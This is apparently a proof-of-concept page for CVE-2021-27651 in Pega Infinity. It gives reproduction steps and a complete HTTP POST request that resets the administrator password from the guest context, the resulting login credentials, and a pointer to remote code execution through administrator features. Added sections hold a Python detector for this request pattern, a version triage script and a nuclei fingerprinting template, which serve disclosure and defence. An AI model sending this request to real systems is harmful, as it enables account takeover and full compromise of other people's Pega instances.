POC details: ba421e5136d6d12a90fbc62afe6652475b9af9dc

Related vulnerability
Title: PEGA Pega Infinity authorization issue vulnerability (CVE-2021-27651)
Description: Pega Infinity is an application platform from the US company Pega, marketed as a path from digital chaos to genuine digital transformation. Pega Infinity versions 8.2.1 through 8.5.2 contain an authorization flaw: the password reset function for local accounts can be used to bypass the local authentication check.
Description
bypass all stages of the password reset flow
Introduction
## Summary
An attacker can bypass all stages of the password reset flow and reset any user's password on Pega Infinity. This is done by (1) initiating the password reset flow and entering the victim's email, then (2) sending the HTTP POST request that updates the password directly, without completing the confirmation step. The attacker can then log in with the newly set password and fully compromise the Pega instance through the many administrator-only post-auth code execution vectors (modifying dynamic pages, templating, etc.).

## Steps to Reproduce
1. Browse to the login page of any Pega instance
2. Click "reset password"
3. Type in "administrator@pega.com", intercept the resulting HTTP request in a proxy, send a copy to Burp Repeater (or an equivalent tool), then let the original request through by disabling interception or forwarding it
4. After the initial request has gone through, edit the request body in Repeater so it contains the following data. `:PEGA_ID` stands for the per-site unique ID, which looks like `ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W`:

```
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
```

5. Send the modified request, then log in with the following credentials. The confirmation step of the reset flow has been skipped and the administrator account is now accessible...

```
administrator@pega.com / Rules@1234
```

6. From there, RCE can be achieved through any of the administrator-only code execution vectors the platform accepts
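Detection logic for the request shape described in the steps above, written as an added example (it is not code from the original report). The activity name, parameter names and URL shape are taken from the PoC request; the log format, client IPs and decoy requests are constructed for the example. The point worth noticing is the encoding: the PoC body carries the `=` of `pyActivity=...` percent-encoded, so a rule that greps the raw body for `pyActivity=Code-Security` never fires on the exact PoC.

```python
import json
import re
from urllib.parse import parse_qs, unquote_plus

# Added example (not code from the original report): flag a POST that runs the
# password-change activity from the unauthenticated guest context
# (pzAuth=guest) with a NewPassword. Names from the report: the activity, the
# pzAuth/NewPassword parameters and the URL shape. Everything else (the JSON
# request-log format, IPs, decoy bodies) is constructed for this example.

ACTIVITY = "Code-Security.pzChangeUserPassword"
# Path shape from the PoC: /prweb/PRServlet/app/<app>/<PEGA_ID>*/!STANDARD.
# Assumption: other application aliases use the same layout; widen if needed.
PATH_RE = re.compile(r"^/prweb/PRServlet/app/[^/]+/[^/]+/!STANDARD$")


def is_reset_bypass(method: str, path: str, body: str) -> bool:
    """True for a POST that invokes the password-change activity as guest."""
    if method.upper() != "POST" or not PATH_RE.match(path):
        return False
    # The PoC sends "pyActivity%3DCode-Security.pzChangeUserPassword=", so the
    # activity arrives as a parameter *name* with an empty value. Decode the
    # whole body first so the encoded and the plain spelling match alike.
    decoded = unquote_plus(body)
    m = re.search(r"(?:^|&)pyActivity=([^&=]*)", decoded)
    if not m or m.group(1) != ACTIVITY:
        return False
    params = parse_qs(body, keep_blank_values=True)
    auth = params.get("pzAuth", [""])[0].lower()
    new_pw = params.get("NewPassword", [""])[0]
    return auth == "guest" and bool(new_pw)


def scan_log(lines):
    """Return the client IPs of log records matching the bypass pattern."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if is_reset_bypass(rec.get("method", ""), rec.get("path", ""),
                           rec.get("body", "")):
            hits.append(rec.get("client", "?"))
    return hits


# Constructed request log: one JSON object per line, as a reverse proxy that
# logs request bodies might emit. Record 1 is the PoC body from the report;
# record 4 is the same activity with the '=' left unencoded; the others are
# decoys (a reset-form submission, the API docs probe, and a password change
# from an established session that carries no guest marker).
PEGA_ID = "ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W"
PATH = f"/prweb/PRServlet/app/default/{PEGA_ID}*/!STANDARD"
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"client": "203.0.113.10", "method": "POST", "path": PATH,
     "body": "pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234"
             "&pyActivity%3DCode-Security.pzChangeUserPassword="},
    {"client": "203.0.113.10", "method": "POST", "path": PATH,
     "body": "pzAuth=guest&UserIdentifier=administrator%40pega.com"},
    {"client": "198.51.100.7", "method": "GET",
     "path": "/prweb/PRRestService/unauthenticatedAPI/v1/docs", "body": ""},
    {"client": "203.0.113.11", "method": "POST", "path": PATH,
     "body": "pyActivity=Code-Security.pzChangeUserPassword&pzAuth=guest"
             "&NewPassword=x&ConfPassword=x"},
    {"client": "192.0.2.5", "method": "POST", "path": PATH,
     "body": "NewPassword=x&ConfPassword=x"
             "&pyActivity=Code-Security.pzChangeUserPassword"},
])

if __name__ == "__main__":
    for ip in scan_log(SAMPLE_LOG.splitlines()):
        print("possible CVE-2021-27651 reset bypass from", ip)
```

Running the block reports the first and fourth records only. The rule keys on the combination of guest context and the password-change activity rather than on the path alone, because the same `!STANDARD` endpoint carries ordinary, legitimate traffic.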

## Affected Versions
Pega Infinity 8.2.1 through 8.5.2 (inclusive)
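A triage helper for the range just stated, added here as an example (not part of the original report). It compares versions as integer tuples, because a string comparison of version numbers sorts "8.5.10" before "8.5.2" and would mark releases above the range as affected. The hostnames and versions in the sample inventory are made up.

```python
import re

# Added example (not from the original report): is a given Pega Infinity
# version inside the advisory's range 8.2.1 <= version <= 8.5.2?
AFFECTED_MIN = (8, 2, 1)
AFFECTED_MAX = (8, 5, 2)

_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?\s*$")


def parse_version(text: str) -> tuple:
    """Parse 'MAJOR.MINOR[.PATCH]' into a comparable tuple; PATCH defaults to 0."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_affected(text: str) -> bool:
    """True when the version falls inside the stated affected range."""
    # Tuple comparison, not string comparison: "8.5.10" < "8.5.2" as text.
    return AFFECTED_MIN <= parse_version(text) <= AFFECTED_MAX


def triage(inventory: dict) -> list:
    """Given {host: version}, return the hosts inside the affected range."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))


# Constructed inventory; hostnames and versions are made up for the example.
SAMPLE_INVENTORY = {
    "pega-prod-01": "8.5.2",   # upper bound of the stated range
    "pega-prod-02": "8.5.3",   # outside the stated range
    "pega-dev-01": "8.2",      # parsed as 8.2.0, below the stated lower bound
    "pega-uat-01": "8.5.10",   # above 8.5.2, although it sorts before it as text
    "pega-legacy": "8.4.1",
}

if __name__ == "__main__":
    print("hosts in the affected range:", triage(SAMPLE_INVENTORY))
```

Only the versions the advisory names are treated as affected; a version that parses below 8.2.1 is reported as out of range, not as safe, so confirm such hosts separately.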

## Impact
Full compromise of any Pega instance, with no prior access, credentials or knowledge of the target required.

## Supporting Media
![Password bypass](https://i.imgur.com/kxLRhys.png)
* Password bypass

![Remote code execution via shell upload](https://i.imgur.com/zC8kOfG.png)
* Remote code execution via shell upload

## Nuclei Template
This template only fingerprints a Pega instance by fetching the unauthenticated API docs and matching on "Pega API"; it does not test for the bypass itself, which is why its severity is low. Newer nuclei releases use the `http:` key in place of `requests:`.
```
id: pega

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"
```

## Credit
Andri Wijayanti (@andridev_),
File snapshot

/data/pocs/ba421e5136d6d12a90fbc62afe6652475b9af9dc └── README.md (2.8K); 0 directories, 1 file